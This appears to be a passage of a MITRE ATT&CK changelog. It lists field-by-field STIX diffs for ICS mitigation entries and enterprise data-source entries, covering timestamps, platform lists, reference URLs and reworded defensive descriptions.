modified2020-09-22 16:50:45.681000+00:002022-10-24 15:09:07.609000+00:00
descriptionProvide operators with redundant, out-of-band communication to support monitoring and control of the operational processes, especially when recovering from a network outage. (Citation: NIST Apr 2013)(Citation: DARPA) Out-of-band communication should utilize diverse systems and technologies to minimize common failure modes and vulnerabilities within the communications infrastructure. For example, wireless networks (e.g., 3G, 4G) can be used to provide diverse and redundant delivery of data.Have alternative methods to support communication requirements during communication failures and data integrity attacks. (Citation: National Institute of Standards and Technology April 2013) (Citation: Defense Advanced Research Projects Agency)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0810https://attack.mitre.org/mitigations/M0810
external_references[1]['source_name']NIST Apr 2013National Institute of Standards and Technology April 2013
external_references[1]['description']National Institute of Standards and Technology. (2013, April). Security and Privacy Controls for Federal Information Systems and Organizations. Retrieved September 17, 2020.National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17
external_references[2]['source_name']DARPADefense Advanced Research Projects Agency
external_references[2]['description']Defense Advanced Research Projects Agency. (n.d.). Rapid Attack Detection, Isolation and Characterization Systems (RADICS). Retrieved September 17, 2020.Defense Advanced Research Projects Agency National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 Rapid Attack Detection, Isolation and Characterization Systems (RADICS) Retrieved. 2020/09/17

[M0927] Password Policies

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - IA-5', 'IEC 62443-3-3:2013 - SR 1.5', 'IEC 62443-4-2:2019 - CR 1.5']
values_changed
STIX FieldOld valueNew Value
modified2021-04-10 14:13:35.792000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0927https://attack.mitre.org/mitigations/M0927

[M0926] Privileged Account Management

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - AC-2', 'IEC 62443-3-3:2013 - SR 1.3', 'IEC 62443-4-2:2019 - CR 1.3']
values_changed
STIX FieldOld valueNew Value
modified2021-04-10 14:13:36.655000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0926https://attack.mitre.org/mitigations/M0926

[M0811] Redundancy of Service

Current version: 1.0


Old Description
New Description
t1Redundancy could be provided through both the devices or sert1Redundancy could be provided for both critical ICS devices a
>vices, such as back-up devices or hot-standby's. Hot-standby>nd services, such as back-up devices or hot-standbys.
>s in diverse locations can ensure continued operations if th 
>e primarily system are compromised or unavailable. At the ne 
>twork layer, protocols such as the Parallel Redundancy Proto 
>col (PRP, IEC 62439-3:2012-07) can be used to simulatenously 
> use redundant and diverse communication over a local networ 
>k. 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - CP-9']
values_changed
STIX FieldOld valueNew Value
modified2020-09-29 16:53:45.681000+00:002022-10-24 15:09:07.609000+00:00
descriptionRedundancy could be provided through both the devices or services, such as back-up devices or hot-standby's. Hot-standbys in diverse locations can ensure continued operations if the primarily system are compromised or unavailable. At the network layer, protocols such as the Parallel Redundancy Protocol (PRP, IEC 62439-3:2012-07) can be used to simulatenously use redundant and diverse communication over a local network.Redundancy could be provided for both critical ICS devices and services, such as back-up devices or hot-standbys.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0811https://attack.mitre.org/mitigations/M0811

[M0922] Restrict File and Directory Permissions

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - AC-6', 'IEC 62443-3-3:2013 - SR 2.1', 'IEC 62443-4-2:2019 - CR 2.1']
values_changed
STIX FieldOld valueNew Value
modified2021-04-10 14:12:39.136000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0922https://attack.mitre.org/mitigations/M0922

[M0944] Restrict Library Loading

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - CP-7', 'IEC 62443-3-3:2013 - SR 7.7', 'IEC 62443-4-2:2019 - CR 7.7']
values_changed
STIX FieldOld valueNew Value
modified2021-04-10 14:16:01.740000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0944https://attack.mitre.org/mitigations/M0944

[M0924] Restrict Registry Permissions

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - AC-6', 'IEC 62443-3-3:2013 - SR 2.1', 'IEC 62443-4-2:2019 - CR 2.1']
values_changed
STIX FieldOld valueNew Value
modified2021-04-10 14:13:59.577000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0924https://attack.mitre.org/mitigations/M0924

[M0921] Restrict Web-Based Content

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - SC-18', 'IEC 62443-3-3:2013 SR 2.4', 'IEC 62443-4-2:2019 - HDR 2.4']
values_changed
STIX FieldOld valueNew Value
modified2021-04-10 14:10:59.206000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0921https://attack.mitre.org/mitigations/M0921

[M0920] SSL/TLS Inspection

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-10 14:10:34.146000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0920https://attack.mitre.org/mitigations/M0920

[M0812] Safety Instrumented Systems

Current version: 1.0


Old Description
New Description
t1Utilize Safety Instrumented Systems (SIS) to provide an addit1Utilize Safety Instrumented Systems (SIS) to provide an addi
>tional layer of protection to hazard scenarios that may caus>tional layer of protection to hazard scenarios that may caus
>e property damage. A SIS will typically included sensors, lo>e property damage. A SIS will typically include sensors, log
>gic solvers, and a final control element that can be used to>ic solvers, and a final control element that can be used to 
> automatically respond to an hazardous condition. Ensure tha>automatically respond to an hazardous condition  (Citation: 
>t all SISs are segmented from operational networks to preven>A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2
>t them from being targeted by additional adversarial behavio>004) . Ensure that all SISs are segmented from operational n
>r.>etworks to prevent them from being targeted by additional ad
 >versarial behavior.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-09-22 16:50:45.681000+00:002022-10-24 15:09:07.609000+00:00
descriptionUtilize Safety Instrumented Systems (SIS) to provide an additional layer of protection to hazard scenarios that may cause property damage. A SIS will typically included sensors, logic solvers, and a final control element that can be used to automatically respond to an hazardous condition. Ensure that all SISs are segmented from operational networks to prevent them from being targeted by additional adversarial behavior.Utilize Safety Instrumented Systems (SIS) to provide an additional layer of protection to hazard scenarios that may cause property damage. A SIS will typically include sensors, logic solvers, and a final control element that can be used to automatically respond to an hazardous condition (Citation: A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004) . Ensure that all SISs are segmented from operational networks to prevent them from being targeted by additional adversarial behavior.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0812https://attack.mitre.org/mitigations/M0812
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004', 'description': 'A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004 APPLYING THE LATEST STANDARD FOR FUNCTIONAL SAFETY IEC 61511 Retrieved. 2020/09/17 ', 'url': 'https://www.icheme.org/media/9906/xviii-paper-23.pdf'}

[M0954] Software Configuration

Current version: 1.0


Old Description
New Description
t1Implement configuration changes to software (other than the t1Implement configuration changes to software (other than the 
>operating system) to mitigate security risks associated to h>operating system) to mitigate security risks associated with
>ow the software operates.> how the software operates.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - CM-7', 'IEC 62443-3-3:2013 - SR 7.7', 'IEC 62443-4-2:2019 - CR 7.7']
values_changed
STIX FieldOld valueNew Value
modified2021-04-10 14:18:09.471000+00:002022-10-24 15:09:07.609000+00:00
descriptionImplement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.Implement configuration changes to software (other than the operating system) to mitigate security risks associated with how the software operates.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0954https://attack.mitre.org/mitigations/M0954

[M0813] Software Process and Device Authentication

Current version: 1.0


Old Description
New Description
t1Require the authentication of devices and software processest1Require the authentication of devices and software processes
> where appropriate. Devices that connect remotely to other s> where appropriate. Devices that connect remotely to other s
>ystems should require strong authentication to prevent spoof>ystems should require strong authentication to prevent spoof
>ing of communications. Furthermore, software processes shoul>ing of communications. Furthermore, software processes shoul
>d also require authentication if accessing a local or remote>d also require authentication when accessing APIs.
> API. 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - IA-9', 'IEC 62443-3-3:2013 - SR 1.2', 'IEC 62443-4-2:2019 - CR 1.2']
values_changed
STIX FieldOld valueNew Value
modified2020-09-25 14:47:45.681000+00:002022-10-24 15:09:07.609000+00:00
descriptionRequire the authentication of devices and software processes where appropriate. Devices that connect remotely to other systems should require strong authentication to prevent spoofing of communications. Furthermore, software processes should also require authentication if accessing a local or remote API.Require the authentication of devices and software processes where appropriate. Devices that connect remotely to other systems should require strong authentication to prevent spoofing of communications. Furthermore, software processes should also require authentication when accessing APIs.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0813https://attack.mitre.org/mitigations/M0813

[M0814] Static Network Configuration

Current version: 1.0


Old Description
New Description
t1Configure hosts and devices to use static network configuratt1Configure hosts and devices to use static network configurat
>ions when possible, protocols that require dynamic discovery>ions when possible, protocols that require dynamic discovery
>/addressing (e.g., ARP, DHCP, DNS) can be used to manipulate>/addressing (e.g., ARP, DHCP, DNS) can be used to manipulate
> network message forwarding and enable various MitM attacks.> network message forwarding and enable various MitM attacks.
> This mitigation may not always be usable due to limited dev> This mitigation may not always be usable due to limited dev
>ice features or challenges introduced with network configura>ice features or challenges introduced with different network
>tions.> configurations.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - CM-7', 'IEC 62443-3-3:2013 - SR 7.7', 'IEC 62443-4-2:2013 - CR 7.7']
values_changed
STIX FieldOld valueNew Value
modified2020-09-25 15:01:45.681000+00:002022-10-24 15:09:07.609000+00:00
descriptionConfigure hosts and devices to use static network configurations when possible, protocols that require dynamic discovery/addressing (e.g., ARP, DHCP, DNS) can be used to manipulate network message forwarding and enable various MitM attacks. This mitigation may not always be usable due to limited device features or challenges introduced with network configurations.Configure hosts and devices to use static network configurations when possible, protocols that require dynamic discovery/addressing (e.g., ARP, DHCP, DNS) can be used to manipulate network message forwarding and enable various MitM attacks. This mitigation may not always be usable due to limited device features or challenges introduced with different network configurations.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0814https://attack.mitre.org/mitigations/M0814

[M0817] Supply Chain Management

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-12 17:00:21.233000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0817https://attack.mitre.org/mitigations/M0817

[M0919] Threat Intelligence Program

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-10 14:09:50.927000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0919https://attack.mitre.org/mitigations/M0919

[M0951] Update Software

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - SI-2', 'IEC 62443-4-2:2019 - CR 3.10']
values_changed
STIX FieldOld valueNew Value
modified2021-04-10 14:18:39.005000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0951https://attack.mitre.org/mitigations/M0951

[M0918] User Account Management

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - AC-2', 'IEC 62443-3-3:2013 - SR 1.3', 'IEC 62443-4-2:2019 - CR 1.3']
values_changed
STIX FieldOld valueNew Value
modified2021-04-10 14:09:12.270000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0918https://attack.mitre.org/mitigations/M0918

[M0917] User Training

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - AT-2']
values_changed
STIX FieldOld valueNew Value
modified2021-04-10 14:06:20.173000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0917https://attack.mitre.org/mitigations/M0917

[M0916] Vulnerability Scanning

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - RA-5']
values_changed
STIX FieldOld valueNew Value
modified2021-04-10 14:20:06.356000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0916https://attack.mitre.org/mitigations/M0916

[M0815] Watchdog Timers

Current version: 1.0


Old Description
New Description
t1Utilize watchdog timers to ensure devices can quickly detectt1Utilize watchdog timers to ensure devices can quickly detect
> whether a system is operational, unresponsive, or in a good> whether a system is unresponsive.
> state. System / process restarts should be performed when a 
> timeout condition occurs. 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['IEC 62443-4-2:2019 - CR 7.2']
values_changed
STIX FieldOld valueNew Value
modified2020-09-29 17:25:45.681000+00:002022-10-24 15:09:07.609000+00:00
descriptionUtilize watchdog timers to ensure devices can quickly detect whether a system is operational, unresponsive, or in a good state. System / process restarts should be performed when a timeout condition occurs.Utilize watchdog timers to ensure devices can quickly detect whether a system is unresponsive.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0815https://attack.mitre.org/mitigations/M0815

Data Sources

enterprise-attack

Minor Version Changes

[DS0017] Command

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
revokedFalse
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-11-10T09:30:48.694901Z2022-10-21T15:55:31.986Z
x_mitre_platforms[0]WindowsContainers
x_mitre_platforms[2]macOSNetwork
x_mitre_platforms[3]NetworkWindows
x_mitre_platforms[4]ContainersmacOS
x_mitre_version1.01.1
x_mitre_contributors[0]Austin ClarkCenter for Threat-Informed Defense (CTID)
x_mitre_contributors[1]Center for Threat-Informed Defense (CTID)Austin Clark, @c2defense
x_mitre_collection_layers[0]HostContainer
x_mitre_collection_layers[1]ContainerHost
created2021-10-20T15:05:19.273124Z2021-10-20T15:05:19.273Z
external_references[0]['url']https://attack.mitre.org/datasources/DS0017https://attack.mitre.org/data-sources/DS0017

[DS0028] Logon Session

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Logon occurring on a system or resource (local, domain, or ct1Logon occurring on a system or resource (local, domain, or c
>loud) to which a user/device is gaining access after success>loud) to which a user/device is gaining access after success
>ful authentication and authorizaton(Citation: Microsoft Audi>ful authentication and authorization(Citation: Microsoft Aud
>t Logon Events)>it Logon Events)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
revokedFalse
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-11-10T09:30:48.696771Z2022-10-21T15:56:16.481Z
descriptionLogon occurring on a system or resource (local, domain, or cloud) to which a user/device is gaining access after successful authentication and authorizaton(Citation: Microsoft Audit Logon Events)Logon occurring on a system or resource (local, domain, or cloud) to which a user/device is gaining access after successful authentication and authorization(Citation: Microsoft Audit Logon Events)
x_mitre_platforms[0]WindowsAzure AD
x_mitre_platforms[1]LinuxGoogle Workspace
x_mitre_platforms[2]macOSIaaS
x_mitre_platforms[3]IaaSLinux
x_mitre_platforms[4]SaaSOffice 365
x_mitre_platforms[5]Office 365SaaS
x_mitre_platforms[6]Azure ADWindows
x_mitre_platforms[7]Google WorkspacemacOS
x_mitre_version1.01.1
created2021-10-20T15:05:19.274352Z2021-10-20T15:05:19.274Z
external_references[0]['url']https://attack.mitre.org/datasources/DS0028https://attack.mitre.org/data-sources/DS0028
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_collection_layersCloud Control Plane
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_collection_layersCloud Control Plane

[DS0004] Malware Repository

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
revokedFalse
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_contributors[]
values_changed
STIX FieldOld valueNew Value
modified2021-10-20T15:05:19.271698Z2022-10-20T20:20:36.693Z
x_mitre_version1.01.1
created2021-10-20T15:05:19.271698Z2021-10-20T15:05:19.271Z
external_references[0]['url']https://attack.mitre.org/datasources/DS0004https://attack.mitre.org/data-sources/DS0004

[DS0029] Network Traffic

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
revokedFalse
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-11-10T09:30:48.697365Z2022-10-20T20:18:34.334Z
x_mitre_platforms[0]WindowsIaaS
x_mitre_platforms[2]macOSWindows
x_mitre_platforms[3]IaaSmacOS
x_mitre_version1.01.1
created2021-10-20T15:05:19.274446Z2021-10-20T15:05:19.274Z
external_references[0]['url']https://attack.mitre.org/datasources/DS0029https://attack.mitre.org/data-sources/DS0029
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_collection_layersCloud Control Plane
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_collection_layersCloud Control Plane

[DS0009] Process

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
revokedFalse
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-11-10T09:30:48.697770Z2022-10-21T15:58:32.516Z
x_mitre_platforms[0]WindowsLinux
x_mitre_platforms[1]LinuxWindows
x_mitre_version1.01.1
created2021-10-20T15:05:19.272143Z2021-10-20T15:05:19.272Z
external_references[0]['url']https://attack.mitre.org/datasources/DS0009https://attack.mitre.org/data-sources/DS0009

[DS0012] Script

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
revokedFalse
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-11-10T09:30:48.698144Z2022-10-21T15:58:58.335Z
x_mitre_version1.01.1
created2021-10-20T15:05:19.272610Z2021-10-20T15:05:19.272Z
external_references[0]['url']https://attack.mitre.org/datasources/DS0012https://attack.mitre.org/data-sources/DS0012
external_references[1]['source_name']Microsoft PowerShell LoggingFireEye PowerShell Logging
external_references[1]['description']Microsoft. (2020, March 30). about_Logging_Windows. Retrieved September 28, 2021.Dunwoody, M. (2016, February 11). Greater Visibility Through PowerShell Logging. Retrieved September 28, 2021.
external_references[1]['url']https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
external_references[2]['source_name']FireEye PowerShell LoggingMicrosoft AMSI
external_references[2]['description']Dunwoody, M. (2016, February 11). Greater Visibility Through PowerShell Logging. Retrieved September 28, 2021.Microsoft. (2019, April 19). Antimalware Scan Interface (AMSI). Retrieved September 28, 2021.
external_references[2]['url']https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.htmlhttps://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal
external_references[3]['source_name']Microsoft AMSIMicrosoft PowerShell Logging
external_references[3]['description']Microsoft. (2019, April 19). Antimalware Scan Interface (AMSI). Retrieved September 28, 2021.Microsoft. (2020, March 30). about_Logging_Windows. Retrieved September 28, 2021.
external_references[3]['url']https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portalhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7

[DS0013] Sensor Health

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
revokedFalse
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-11-10T09:30:48.698218Z2022-10-20T20:22:52.060Z
x_mitre_platforms[0]WindowsLinux
x_mitre_platforms[1]LinuxWindows
x_mitre_version1.01.1
created2021-10-20T15:05:19.272664Z2021-10-20T15:05:19.272Z
external_references[0]['url']https://attack.mitre.org/datasources/DS0013https://attack.mitre.org/data-sources/DS0013

[DS0002] User Account

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
revokedFalse
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-11-10T09:30:48.698605Z2022-10-21T15:59:59.646Z
x_mitre_platforms[0]WindowsAzure AD
x_mitre_platforms[1]LinuxContainers
x_mitre_platforms[2]macOSGoogle Workspace
x_mitre_platforms[4]SaaSLinux
x_mitre_platforms[6]Azure ADSaaS
x_mitre_platforms[7]ContainersWindows
x_mitre_platforms[8]Google WorkspacemacOS
x_mitre_version1.01.1
created2021-10-20T15:05:19.271422Z2021-10-20T15:05:19.271Z
external_references[0]['url']https://attack.mitre.org/datasources/DS0002https://attack.mitre.org/data-sources/DS0002
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_collection_layersHost
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_collection_layersHost
Metadata-only Changes

[DS0026] Active Directory

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
x_mitre_platforms[0]WindowsAzure AD
x_mitre_platforms[1]Azure ADWindows
x_mitre_collection_layers[0]HostCloud Control Plane
x_mitre_collection_layers[1]Cloud Control PlaneHost
created2021-10-20T15:05:19.274110Z2021-10-20T15:05:19.274Z
modified2021-11-10T09:30:48.693951Z2022-03-30T14:26:51.803Z

[DS0015] Application Log

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_contributors[]
values_changed
STIX FieldOld valueNew Value
x_mitre_platforms[0]WindowsGoogle Workspace
x_mitre_platforms[1]LinuxIaaS
x_mitre_platforms[2]macOSLinux
x_mitre_platforms[3]IaaSOffice 365
x_mitre_platforms[5]Office 365Windows
x_mitre_platforms[6]Google WorkspacemacOS
x_mitre_collection_layers[0]HostCloud Control Plane
x_mitre_collection_layers[1]Cloud Control PlaneHost
